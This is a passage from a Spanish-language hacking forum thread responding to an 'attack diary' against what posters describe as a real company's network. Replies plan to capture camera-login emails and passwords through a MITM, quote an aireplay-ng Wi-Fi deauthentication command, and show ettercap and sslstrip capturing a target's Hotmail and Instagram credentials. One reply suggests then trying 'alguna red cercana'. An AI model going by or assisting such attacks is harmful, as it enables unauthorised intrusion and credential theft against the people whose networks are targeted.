ummm... vengo afilando mis dientes desde que coense a leer y mientras mas le mas emocion me daba y mas idea me llegaban a mi cabeza, para luego leer que la empresa cerro!! me quede vestido y alborotado, bueno para otra fiesta sera.


Título: Re:Diario de un Ataque
Publicado por: gigamurki en Noviembre 30, 2013, 04:33:19 pm
muy buen aporte, me gusto excelente sigue.
Título: Re:Diario de un Ataque
Publicado por: eth en Diciembre 06, 2013, 09:47:08 pm
Que bien documentado lo tienes si señor  ;)
Título: Re:Diario de un Ataque
Publicado por: Naraku en Enero 17, 2014, 05:32:24 am
Mmmm... no se hasta que punto sería necesario un servidor para conectarse a las cámaras... puede que la propia cámara almacene un archivo de configuración con el login y el password y simplemente verifique que són correctos cuando le llega una conexión. Hay una IP dentro de la red que lleva mosqueandome desde que empezamos el ataque, es la 192.168.1.10, ya que el Nmap la detecta como un router, lo cual no me cuadra. Puede que se trate de un servidor.

EDITO: Hace un rato ya que estoy corriendo un ataque MITM con "yamas" y por el momento ha detectado que de vez en cuando desde las cámaras se realiza una conexión a esta dirección prov.eu.mydlink.com, si buscamos esta dirección en google nos encontramos con http://eu.mydlink.com/entrance , donde podemos ver una pestaña de Login y otra de Password. Así que parece que para acceder a las cámaras desde fuera de la LAN la conexión se realiza a través de un servidor externo que no tiene nada que ver con la red. Por el formato del Login podemos deducir que el Login para acceder a las cámaras es un email, así que nuestra prioridad pasa a ser la de capturar un email y su correspondiente password, ya que muy poca gente cambia de de contraseña según la pagina.
Postearé los resultados del MITM al final del día.

EDITO2: Y aquí tenemos un video de como se accede a las cámaras por cortesía de D-Link:
feature=player_embedded#

Aun no termino de leer todo pero puede que la ip 192.168.1.10 sea una impresora en red =o
Título: Re:Diario de un Ataque
Publicado por: Decloban en Enero 17, 2015, 04:58:08 am
Antes de preguntar, he de agradecer bastante esta idea que habéis desarrollado. Muchas gracias.

Mi duda es la siguiente:

aireplay-ng -0 10 -a E0:90:53:4A:68:AA -c 9C:8E:99:33:4D:F0 wlan0

¿Por qué eliges en: -c 9C:8E:99:33:4D:F0  <--- esa MAC si aún no has entrado en la red? No entiendo esa parte de la instrucción.

================ MODIFICADO ======================

Ya supe por qué se utilizaba "-c "MAC"" . Es el cliente de la bssid (me autorespondo)
Título: Re:Diario de un Ataque
Publicado por: [email protected] en Febrero 19, 2015, 05:22:25 pm
Estaria genial otro proyecto como este, me apuntaria como primer lector ^^
Título: Re:Diario de un Ataque
Publicado por: elshotta en Abril 11, 2016, 02:58:57 pm
esta muy bueno el post, lastima que se quedaron con metasploit pero de todas formas nos sirve para los iniciados.  ;D ;D ;D :-\
Título: Re:Diario de un Ataque
Publicado por: necron en Abril 20, 2016, 05:07:39 am
una pena que se haya cortado el hilo, la verdad uno puede aprender mas rápido en grupo que solo pero bueno, espero q haya gente que quiera hacerlo, espero respuestas de quien tenga ganas de aprender en grupo simulando algún escenario, algún lab armado, cualquiera y creo debe haber varios admin x aquí debe saber elaborar un escenario similar o peor, en el cual nos tengamos q taladrar la cabeza para tratar de romperlo, por mi parte soy novato en esto, me eh quemado las pestañas leyendo sobre el tema y me apasiona, tengo un lab en mi casa pero voy muy lento debido a q no tengo ayuda y ay q leer muuuuuuuuchooooooooo para aprender, eso si lo se, espero q alguien o algunos podamos contactarnos ya se ax aqui o cualquier otro medio para compartir conocimientos, saludos
Título: Re:Diario de un Ataque
Publicado por: Dedsec en Abril 27, 2016, 10:31:30 pm
esta muy bueno el post parece que estas leyendo una historia muy bien explicado y muy bien resumido algo entretenido y de muy buen aprendisaje un saludo
Título: Re:Diario de un Ataque
Publicado por: hacker fashion en Junio 24, 2016, 10:39:59 am
Wow debo admitir que este post me gusto mucho, ojala pudieran hacer más post como este planteando diversos escenarios, de esta forma se aprende bastante.
Título: Re:Diario de un Ataque
Publicado por: ElcOcO en Junio 27, 2016, 06:31:08 am
sinceramente encuentro muy interesante el post, sobre todo aprender, el trabajo que realizaste estuvo FELOmenal, pues asi lo veo yo como novato :P que soy, espero algun dia poner aqui el diario de un atake tambien jeje. Gracias por el aporte 8)
Título: Re:Diario de un Ataque
Publicado por: manuelmorgia en Julio 06, 2016, 11:08:05 pm
Esto lo mando a marcadores para leerlo detenidamente  ;D
Título: Re:Diario de un Ataque
Publicado por: xHulkMx en Julio 07, 2016, 07:22:12 pm
 ;D Hola  odeveku:

La verdad no pude parar de leer tu post desde que lo vi se que tiene tiempo pero igual me aporto muchísimo y me puso a investigar, así aprendí mucho me abrió el panorama y me motiva ya que no entendía nada y ahora se por donde empezar.

Gracias y mucho éxito amigo. ;)
Título: Re:Diario de un Ataque
Publicado por: neocarvajal en Diciembre 02, 2016, 10:22:41 pm
Para que sea un poco más real el caso de estudio el protocolo no deberia ser web sino wpa2 ya que es lo primero que la mayoria de usuarios hace para proteger su red wifi.

 Una herramienta muy buena una vez dentro de la red es ettercap (para ataques ARP Spoofing) que apoyado de iptables y sslstrip  pueden obtener las credenciales de los usuarios de la red LAN que intente ingresar en cualquier formulario o login.

En casa pude realizar algunas pruebas con exito aquí les dejo unas capturas de los resultados:

Escuchando paquetes:

(http://i.imgur.com/8QhB5b9.jpg)

Target introduciendo usuario en hotmail:


(http://i.imgur.com/FrsS5Qm.jpg)

Target no puede ingresar a hotmail luego de introducir datos de usuario y clave  (datos POST enviados en http, texto plano a mi maquina):

(http://i.imgur.com/DWAWvfh.jpg)

Datos capturados hotmail:

(http://i.imgur.com/yp8tCyO.jpg)

Capturando datos de instagram:

(http://i.imgur.com/1dhEnbE.jpg)
Título: Re:Diario de un Ataque
Publicado por: neocarvajal en Diciembre 03, 2016, 12:54:51 am
Hola de nuevo HxC!
Lamentablemente el post no se va a continuar. La empresa a la que pertenecía la red que estabamos atacando ha cerrado (hay que joderse con la crisis). Asi que nada gente, es una pena pero aquí nos quedamos. Salu2 a to2.

Con fines educativos se podría hacer el ataque en una red local propia con varios ordenadores y un router hasta lograr sacar el mejor provecho, luego seria de probar con alguna red cercana
Título: Re:Diario de un Ataque
Publicado por: larson32 en Agosto 21, 2017, 07:53:40 am
buen post
Título: Re:Diario de un Ataque
Publicado por: soldi3r en Septiembre 18, 2017, 12:38:26 am
Gracias por este artículo informativo detallado. Espero que funcione para mí.